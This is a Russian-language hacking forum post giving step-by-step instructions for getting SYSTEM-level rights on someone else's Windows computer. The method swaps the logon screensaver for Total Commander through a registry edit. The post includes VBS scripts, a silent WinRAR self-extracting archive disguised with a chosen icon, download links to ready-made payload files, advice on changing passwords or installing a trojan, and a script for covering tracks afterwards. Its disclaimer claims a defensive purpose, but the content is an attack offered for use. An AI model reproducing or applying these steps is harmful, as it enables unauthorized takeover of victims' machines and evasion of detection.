Взлом осуществляется подменой заставки которая запускается если выйти в экран приветствия (то есть выходом из всех пользователей.....), на Тотал Коммандер, который будет иметь полные Админские права.........

Для этого нам понадобится 1 самораспоковывающийся файл, я его создал винраром......
Самораспаковывающийся архив содержит в себе ТОТАЛ КОМАНДЕР и vbs файл, который изменяет стандартную заставку на ТКМД. Этот ехешник сам выполняет то что надо просто его надо запустить, не удивляётесь если почле запуска ничего не произойдёт, файл работает в фоне....

Вот что вам следует сделать:
1. Для Взлома нужно скопировать все установленные файлы Total Commander'a
в %SYSTEMROOT%\SYSTEM32\ у многих это тут С:\WINDOWS\system32\. (То есть надо найти папку винды (Windows) и в папке винды найти system32 ту и залить файлы)
Потом запускаем редактор реестра (regedit) заходим HKEY/USERS/DEFAULT/Control Panel/Desktop. В строковом параметре "SCRNSAVE.EXE" меняем значение scrnsave.scr на Totalcmd.exe.
У разных версий винды это значение неодинаковое.......... значение SCRNSAVE.EXE могут быть и scrnsave.scr и logon.scr...... по этому запомните начальное значение, так как придётся заметать следы..........

Там же находится еще один параметр "ScreenSaveTimeOut". Он отвечает за время через которое запустится скринсейвер, в нем ставим значение 100 (это примерно 2мин.) Иногда этого не достаточно чтобы все сработало на 100% тогда запускаем в реестре поиск и прописываем SCRNSAVE.EXE и ищем все параметры с таким названием, изменяя значения на выше указанные.
_____________________________________________________________________________
Каждый раз при взломе разбиратся с этим нудное дело, можно создать одирн файл, который всё это выполнит....
Значит создаём винраром SFX архив, там у нас будет Тотал командер и VBS файл.
Тело VBS
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite "HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.exe","Имя.Расширение" запускаемого файла, вместо скринсейвера....В данном случае (по дефолтуTotalcmd.exe)"
Пишем куда извлекатьв винраре %systemroot%\system32

Пишем туда где написано запуск программы после извлечения архива (в винраре) %sytemroot%\system32\имя_файла.расширение (vbs)
В винраре вибыраем ничего не показывать, также можно выбрать иконку для маскировки.......

Если кому то лень с этим Возиться то вот готовый файл http://depositfiles.com/files/0xp01dbggl  

2. Запустить его на компе жертвы и подождать 30 сек...


3. Сделать выход из пользователя....


4. Ждать максимум 5 минут.........


5. И всё... На компе запустится ТОТАЛ КОММАНДЕР с полными правами Админа! (так как его запускает SYSTEM)


Теперь вы можете запустить и управление пользователями (Там можно поменять пароли), и запустить троян и установить игрушку итд итп, но не надо закрывать тотал командер во время работы!!!! ЛУЧШЕ СВЕРНУТЬ..........

Но надо ещё замести следы! Для этого нужно будет создать лекарство.....

Открываем Блокнот и пишем туда

on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite "HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.exe","scrnsave.scr или logon.scr надо было запомнить" "
fso.deletefile "C:\windows\System32\Totalcmd.exe",1

сохраняем как vbs и запускаем
этот файл Заметает следы

Если кому то лень с этим разбираться вот эти два лекарства >>> http://depositfiles.com/files/d5j8jzspdl

 

можете проделать выше написанное на своём компе если не верите что сработает.....
вобщем это самый безопасный и лёгкий метод...........

ps. Новички не надо этого делать из-за неффиг делать............статья только для того чтобы знать от чего обороняться...............

HEROX [DAPH]